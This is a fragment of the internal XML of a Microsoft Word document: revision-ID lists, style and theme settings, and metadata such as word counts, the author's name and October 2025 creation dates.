    <w:rsid w:val="61414E9A"/>
    <w:rsid w:val="61C918FB"/>
    <w:rsid w:val="621B5E82"/>
    <w:rsid w:val="62AF08F4"/>
    <w:rsid w:val="62F97A6F"/>
    <w:rsid w:val="63CF2051"/>
    <w:rsid w:val="63F95413"/>
    <w:rsid w:val="64056CA7"/>
    <w:rsid w:val="64C612E4"/>
    <w:rsid w:val="64FC2D2E"/>
    <w:rsid w:val="655B17D7"/>
    <w:rsid w:val="657F0712"/>
    <w:rsid w:val="65A550CF"/>
    <w:rsid w:val="65AA4DDA"/>
    <w:rsid w:val="65CE3D15"/>
    <w:rsid w:val="66AF0E04"/>
    <w:rsid w:val="66D954CC"/>
    <w:rsid w:val="66F205F4"/>
    <w:rsid w:val="67444B7B"/>
    <w:rsid w:val="677A75D3"/>
    <w:rsid w:val="678061B5"/>
    <w:rsid w:val="680C0D40"/>
    <w:rsid w:val="68814582"/>
    <w:rsid w:val="693E4935"/>
    <w:rsid w:val="693F5C3A"/>
    <w:rsid w:val="69937E95"/>
    <w:rsid w:val="69DA38BA"/>
    <w:rsid w:val="6A596387"/>
    <w:rsid w:val="6A5A3E08"/>
    <w:rsid w:val="6A70182F"/>
    <w:rsid w:val="6A7C1DBF"/>
    <w:rsid w:val="6A7D30C3"/>
    <w:rsid w:val="6AAC3C13"/>
    <w:rsid w:val="6BD126F0"/>
    <w:rsid w:val="6C01543E"/>
    <w:rsid w:val="6C2F050B"/>
    <w:rsid w:val="6CBA266E"/>
    <w:rsid w:val="6CFE1E5E"/>
    <w:rsid w:val="6D264001"/>
    <w:rsid w:val="6D450054"/>
    <w:rsid w:val="6DF67E77"/>
    <w:rsid w:val="6E45347A"/>
    <w:rsid w:val="6EA72219"/>
    <w:rsid w:val="6EE42C42"/>
    <w:rsid w:val="6EFC1923"/>
    <w:rsid w:val="6F2701E9"/>
    <w:rsid w:val="6F441D17"/>
    <w:rsid w:val="6F881507"/>
    <w:rsid w:val="6FDB6D93"/>
    <w:rsid w:val="70616C6C"/>
    <w:rsid w:val="706224EF"/>
    <w:rsid w:val="70A132D9"/>
    <w:rsid w:val="70D77F30"/>
    <w:rsid w:val="70FB13E9"/>
    <w:rsid w:val="710E5E8B"/>
    <w:rsid w:val="710F390D"/>
    <w:rsid w:val="71367F49"/>
    <w:rsid w:val="713737CC"/>
    <w:rsid w:val="71FC6A0D"/>
    <w:rsid w:val="723039E4"/>
    <w:rsid w:val="723E077B"/>
    <w:rsid w:val="7254291F"/>
    <w:rsid w:val="72BC20E7"/>
    <w:rsid w:val="730B6BCA"/>
    <w:rsid w:val="735F40D6"/>
    <w:rsid w:val="736F2172"/>
    <w:rsid w:val="73846894"/>
    <w:rsid w:val="73A6484A"/>
    <w:rsid w:val="73DC6F23"/>
    <w:rsid w:val="73F90A51"/>
    <w:rsid w:val="74535C68"/>
    <w:rsid w:val="74C35F1C"/>
    <w:rsid w:val="74DD2349"/>
    <w:rsid w:val="756E1C38"/>
    <w:rsid w:val="75757044"/>
    <w:rsid w:val="7591786E"/>
    <w:rsid w:val="75A90798"/>
    <w:rsid w:val="764E3F45"/>
    <w:rsid w:val="76866E81"/>
    <w:rsid w:val="76CB62F1"/>
    <w:rsid w:val="775A5F60"/>
    <w:rsid w:val="777C6115"/>
    <w:rsid w:val="77881F27"/>
    <w:rsid w:val="77BF7E83"/>
    <w:rsid w:val="77C86594"/>
    <w:rsid w:val="77DD6A26"/>
    <w:rsid w:val="7861548E"/>
    <w:rsid w:val="79063A1D"/>
    <w:rsid w:val="79291653"/>
    <w:rsid w:val="79695006"/>
    <w:rsid w:val="7A550DC0"/>
    <w:rsid w:val="7AC313F4"/>
    <w:rsid w:val="7AC932FE"/>
    <w:rsid w:val="7B255C16"/>
    <w:rsid w:val="7B9671CE"/>
    <w:rsid w:val="7C291FC0"/>
    <w:rsid w:val="7C9061B7"/>
    <w:rsid w:val="7D087430"/>
    <w:rsid w:val="7D7541E1"/>
    <w:rsid w:val="7D7809E9"/>
    <w:rsid w:val="7DD16AF9"/>
    <w:rsid w:val="7E466AB8"/>
    <w:rsid w:val="7E890826"/>
    <w:rsid w:val="7E9520BA"/>
    <w:rsid w:val="7E994343"/>
    <w:rsid w:val="7EB2746C"/>
    <w:rsid w:val="7EBB4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3F73908"/>
  <w15:docId w15:val="{AC4D51F8-12E7-4AFD-9C33-F0B10F5F0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asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:lang w:eastAsia="zh-CN"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99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00483CA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FFFFFF"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="000000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3</Pages>
  <Words>211</Words>
  <Characters>1206</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>10</Lines>
  <Paragraphs>2</Paragraphs>
  <ScaleCrop>false</ScaleCrop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yuval</dc:creator>
  <cp:lastModifiedBy>יובל כוינה</cp:lastModifiedBy>
  <cp:revision>94</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-18T11:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-19T12:29:00Z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52609176541E4B97849232D2FD09DC97_11</vt:lpwstr>
  </property>
</Properties>
</file>